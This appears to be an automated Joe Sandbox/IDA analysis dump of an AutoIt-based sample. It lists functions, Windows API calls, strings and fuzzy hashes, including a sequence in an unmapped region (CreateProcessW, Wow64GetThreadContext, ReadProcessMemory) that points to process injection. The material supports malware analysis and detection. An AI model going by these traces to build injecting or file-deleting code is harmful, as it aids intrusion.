DispatchMessageW.USER32(?), ref: 001EDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EDB9F
Sleep.KERNEL32(0000000A), ref: 001EDBB1

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: eac78b2b4fa1cd25aa0d8840ae6c34ad5bd194c59bb57439607f0ff10953b48d
Instruction ID: 7f87927a598f218d618c0175b18fb9ecdf51a06a731f31baa68ce2c1e31e6586
Opcode Fuzzy Hash: eac78b2b4fa1cd25aa0d8840ae6c34ad5bd194c59bb57439607f0ff10953b48d
Instruction Fuzzy Hash: 35421570618B82DFD728CF25E888B6EB7E0BF46304F55465DF45687291D770E8A8CB82

Function 001E2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001E2D07
RegisterClassExW.USER32(00000030), ref: 001E2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001E2D42
InitCommonControlsEx.COMCTL32(?), ref: 001E2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001E2D6F
LoadIconW.USER32(000000A9), ref: 001E2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001E2D94

Strings

0, xrefs: 001E2CE9
TaskbarCreated, xrefs: 001E2D37
AutoIt v3 GUI, xrefs: 001E2D23
+, xrefs: 001E2CF0

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: cfb4d88241a1371b586b574841dac22071487e6c0b076114b233953cdb99791b
Instruction ID: 004b83cbde086464875fb0626b220fda5b8c4df2379e0238fa4aa05b385a572e
Opcode Fuzzy Hash: cfb4d88241a1371b586b574841dac22071487e6c0b076114b233953cdb99791b
Instruction Fuzzy Hash: 3F21E3B1951348AFDB00DFA4EC5DBDDBBB8FB08701F20821AF615A62A0D7B10594CF91

Function 00218D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

. , xrefs: 0021903A, 00218FD0, 00218FF2

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-2462612998
Opcode ID: 7a39fc2bbddb3086da16f11a5888033c278b194b33878af087ff4ef7874a0907
Instruction ID: 09883a12624fe1ca96e9d432221d4327ebb596dcd88271693ef816b39082cc33
Opcode Fuzzy Hash: 7a39fc2bbddb3086da16f11a5888033c278b194b33878af087ff4ef7874a0907
Instruction Fuzzy Hash: DDC1E474A243499FDB21DFA8D894BEDBBF0AF29310F144199F81497292C77189E1CF60

Function 0022065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0022039A: CreateFileW.KERNELBASE(00000000,00000000,?,00220704,?,?,00000000,?,00220704,00000000,0000000C), ref: 002203B7

GetLastError.KERNEL32 ref: 0022076F
__dosmaperr.LIBCMT ref: 00220776
GetFileType.KERNELBASE(00000000), ref: 00220782
GetLastError.KERNEL32 ref: 0022078C
__dosmaperr.LIBCMT ref: 00220795
CloseHandle.KERNEL32(00000000), ref: 002207B5
CloseHandle.KERNEL32(?), ref: 002208FF
GetLastError.KERNEL32 ref: 00220931
__dosmaperr.LIBCMT ref: 00220938

Strings

H, xrefs: 002208BD

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 157d74543157cc80ff68a046460db69eca0c7ec3e057633ce183e4b7bf5cda83
Instruction ID: 26d3c27f04a55462958aa6ded823c4d5fbb6e467c939d1fbe219b5fe11d78cf9
Opcode Fuzzy Hash: 157d74543157cc80ff68a046460db69eca0c7ec3e057633ce183e4b7bf5cda83
Instruction Fuzzy Hash: FBA12A32A201159FDF29EFB8EC957AE7BA0AB46310F14015DF8159B2D2DB319C62CB91

Function 001E344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002B1418,?,001E2E7F,?,?,?,00000000), ref: 001E3A78

Part of subcall function 001E3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001E3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001E356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0022318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002231CE
RegCloseKey.ADVAPI32(?), ref: 00223210
_wcslen.LIBCMT ref: 00223277
_wcslen.LIBCMT ref: 00223286

Strings

Software\AutoIt v3\AutoIt, xrefs: 001E3560
\, xrefs: 0022328C
Include, xrefs: 00223184, 002231C5
\Include\, xrefs: 001E3527

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 79b7726fc80cde75ba8deda9bd95c02595d05bb4e6e84933aaf29e5af7e91061
Instruction ID: 456cdfa807c3012600ff1ab684a0f35ecf52877922b0a52973a74a4df2847d9c
Opcode Fuzzy Hash: 79b7726fc80cde75ba8deda9bd95c02595d05bb4e6e84933aaf29e5af7e91061
Instruction Fuzzy Hash: 4471CE71414341EEC314EF66EC898AFBBE8FF95340F504A6EF545931A1EB349A48CB62

Function 001E2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001E2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 001E2B9D
LoadIconW.USER32(00000063), ref: 001E2BB3
LoadIconW.USER32(000000A4), ref: 001E2BC5
LoadIconW.USER32(000000A2), ref: 001E2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001E2BEF
RegisterClassExW.USER32(?), ref: 001E2C40

Part of subcall function 001E2CD4: GetSysColorBrush.USER32(0000000F), ref: 001E2D07
Part of subcall function 001E2CD4: RegisterClassExW.USER32(00000030), ref: 001E2D31
Part of subcall function 001E2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001E2D42
Part of subcall function 001E2CD4: InitCommonControlsEx.COMCTL32(?), ref: 001E2D5F
Part of subcall function 001E2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001E2D6F
Part of subcall function 001E2CD4: LoadIconW.USER32(000000A9), ref: 001E2D85
Part of subcall function 001E2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001E2D94

Strings

#, xrefs: 001E2C16
0, xrefs: 001E2C0F
AutoIt v3, xrefs: 001E2C2F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 72f64b818fbf79b338e0ad05a5967adf37058b6768f56f1d40f5eac07dedea6c
Instruction ID: c31604855df607c037c65a46ae0b58eca19ce5ad04a69cee36a23b1ca777e016
Opcode Fuzzy Hash: 72f64b818fbf79b338e0ad05a5967adf37058b6768f56f1d40f5eac07dedea6c
Instruction Fuzzy Hash: C9214F71E00354ABDB109FA5FC6DAADBFF4FB08B50F54019AE504A66A0E7B10560CF90

Function 001E3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,001E316A,?,?), ref: 001E31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,001E316A,?,?), ref: 001E3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001E3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,001E316A,?,?), ref: 001E3232
CreatePopupMenu.USER32 ref: 001E3246
PostQuitMessage.USER32(00000000), ref: 001E3267

Strings

TaskbarCreated, xrefs: 001E322D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: ca3ded68a23c804587f1f26ef482c92f53b1613816fb9dbbfad5680dfac08bdf
Instruction ID: 3dade38c26c789be6cada13f56c9bee6396569811925bd7b33afba9d163ea268
Opcode Fuzzy Hash: ca3ded68a23c804587f1f26ef482c92f53b1613816fb9dbbfad5680dfac08bdf
Instruction Fuzzy Hash: 73418B34220A81B7DB1C2F79BC1DBBD3698E705340F54022DF666872A1DB719A609761

Function 001EDFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%+, xrefs: 001EE1E0
D%+, xrefs: 0023302D
D%+D%+, xrefs: 001EE27E
D%+, xrefs: 00232FDA
D%+, xrefs: 001EE4B1
Variable must be of type 'Object'., xrefs: 002332B7

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID: D%+$D%+$D%+$D%+$D%+D%+$Variable must be of type 'Object'.
API String ID: 0-1976735700
Opcode ID: 21318e77ef38070b7dfa0eee309484eb2055611d590a2103e064e9742dbe7436
Instruction ID: 92b957664597a62ffc2c1b598fed72116938326f74e96519207aa0089ab75ff1
Opcode Fuzzy Hash: 21318e77ef38070b7dfa0eee309484eb2055611d590a2103e064e9742dbe7436
Instruction Fuzzy Hash: E0C29C71A00A45CFCB28CF99C884AADB7F1FF18300F258169E956AB391D371EE51CB91

Function 00D673D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D674A1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D676C7

Memory Dump Source

Source File: 00000000.00000002.2345689506.0000000000D64000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D64000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d64000_smQoKNkwB7.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction ID: 5a78485f8637d4e622394723ff036daa0277e30c241cf5c292ada82511228c3f
Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction Fuzzy Hash: F9A1E670E0420DEBDB14CFA4C994BEEBBB5FF48308F248599E505AB280D7759A81DF64

Function 001E2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001E2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001E2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,001E1CAD,?), ref: 001E2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,001E1CAD,?), ref: 001E2CCF

Strings

edit, xrefs: 001E2CAC
AutoIt v3, xrefs: 001E2C89, 001E2C8E, 001E2C8F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 0d2651187aca66567ecf42d7b4f7c200439f8d070911ad4edf13a729d953178a
Instruction ID: 90b3c9a987991f78fe84024200092a8fa8afbdf3911b083bf7c87b82b163c76c
Opcode Fuzzy Hash: 0d2651187aca66567ecf42d7b4f7c200439f8d070911ad4edf13a729d953178a
Instruction Fuzzy Hash: E1F03A75540290BAEB300723BC1CE776EBDD7C6F50B64419EFA04A21A0E6711860DBB0

Function 00D671C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D670B0: Sleep.KERNELBASE(000001F4), ref: 00D670C1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D672C9

Strings

HE3OMK42T3, xrefs: 00D6732C, 00D6732F

Memory Dump Source

Source File: 00000000.00000002.2345689506.0000000000D64000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D64000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d64000_smQoKNkwB7.jbxd

Similarity

API ID: CreateFileSleep
String ID: HE3OMK42T3
API String ID: 2694422964-3869765568
Opcode ID: 3fa7da01ffbc4d9d48284f92ae165b05a40de39e284018837115582aadb32f58
Instruction ID: c97660b4b497e5659d7d2e2b79d78325f0264ca50ecba02262b1d6d65538d902
Opcode Fuzzy Hash: 3fa7da01ffbc4d9d48284f92ae165b05a40de39e284018837115582aadb32f58
Instruction Fuzzy Hash: BC518F31D1824DDBEF10DBE4C815BEEBB79AF58304F1041A9E609BB2C0D6795B44CBA5

Function 00252947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00252C05
DeleteFileW.KERNEL32(?), ref: 00252C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00252C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00252CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00252CC0

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 9ffdda1fe969ae5efd657f9e29a85a040949e1e407fc0a210afa44e33dec0d4e
Instruction ID: fbc76302b003c629295783e568c8fef5d4b37eabd4a157aef20d15f34136e7d6
Opcode Fuzzy Hash: 9ffdda1fe969ae5efd657f9e29a85a040949e1e407fc0a210afa44e33dec0d4e
Instruction Fuzzy Hash: 9CB17071D10119ABDF11DFA4CC85EDEB7BDEF09345F1040A6F909E6182EB309A588F65

Function 001E3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001E3B0F,SwapMouseButtons,00000004,?), ref: 001E3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001E3B0F,SwapMouseButtons,00000004,?), ref: 001E3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001E3B0F,SwapMouseButtons,00000004,?), ref: 001E3B83

Strings

Control Panel\Mouse, xrefs: 001E3B3E

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 8bb8bc68d67f69abd5c0d97f9408154b868026a1f04b4b492a7188fbca964e8d
Instruction ID: ed7f48f8de5b380796fae3cc3a26e4285a5417be473d37cb5a6c69117c5fdfcb
Opcode Fuzzy Hash: 8bb8bc68d67f69abd5c0d97f9408154b868026a1f04b4b492a7188fbca964e8d
Instruction Fuzzy Hash: 5A112AB5510648FFDB218FA6DC48AAFB7B8EF44744B144559E816D7210D3319E4097A0

Function 00D660B0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00D6686B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D66901
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D66923

Memory Dump Source

Source File: 00000000.00000002.2345689506.0000000000D64000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D64000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d64000_smQoKNkwB7.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction ID: a1eb5f21ba19c1a37f000e8b3791934cbef37ee8d640dd144078463208e13b54
Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction Fuzzy Hash: D8621D30A14658DBEB24CFA4C850BDEB776EF58300F1091A9D10DEB390E7769E81CB69

Function 001E3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002233A2

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 001E3A04

Strings

Line: , xrefs: 002233EB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: c2651fdcea8206fcf4569bcf30243d4251608cd417d887801f9a559514937753
Instruction ID: e701a13728f494e9079c011198ac6eb75f7fe937358e89390c2776417b92c806
Opcode Fuzzy Hash: c2651fdcea8206fcf4569bcf30243d4251608cd417d887801f9a559514937753
Instruction Fuzzy Hash: 7A310271408780AAC324EB21EC49BEFB3D8AF50310F50066AF5A983091EB709A58C7C2

Function 001E2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00222C8C

Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2

Part of subcall function 001E2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001E2DC4

Strings

`e*, xrefs: 00222C85
X, xrefs: 00222C5A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e*
API String ID: 779396738-1794627178
Opcode ID: 2d6a448740cceaa7948d17095770de3cd0df32bcc83ff3073b97e8c73f9ce8c0
Instruction ID: 2ae9c4aa14a8b0d81faa5a8743adb6b32ae0ca0e31db1468ee8acd0d41e0617c
Opcode Fuzzy Hash: 2d6a448740cceaa7948d17095770de3cd0df32bcc83ff3073b97e8c73f9ce8c0
Instruction Fuzzy Hash: 2321D570A10298AFCB01DF95D809BEE7BFCAF59304F04405AE515B7241DBB45A998FA1

Function 001FFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00200668

Part of subcall function 002032A4: RaiseException.KERNEL32(?,?,?,0020068A,?,002B1444,?,?,?,?,?,?,0020068A,001E1129,002A8738,001E1129), ref: 00203304

__CxxThrowException@8.LIBVCRUNTIME ref: 00200685

Strings

Unknown exception, xrefs: 00200692

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
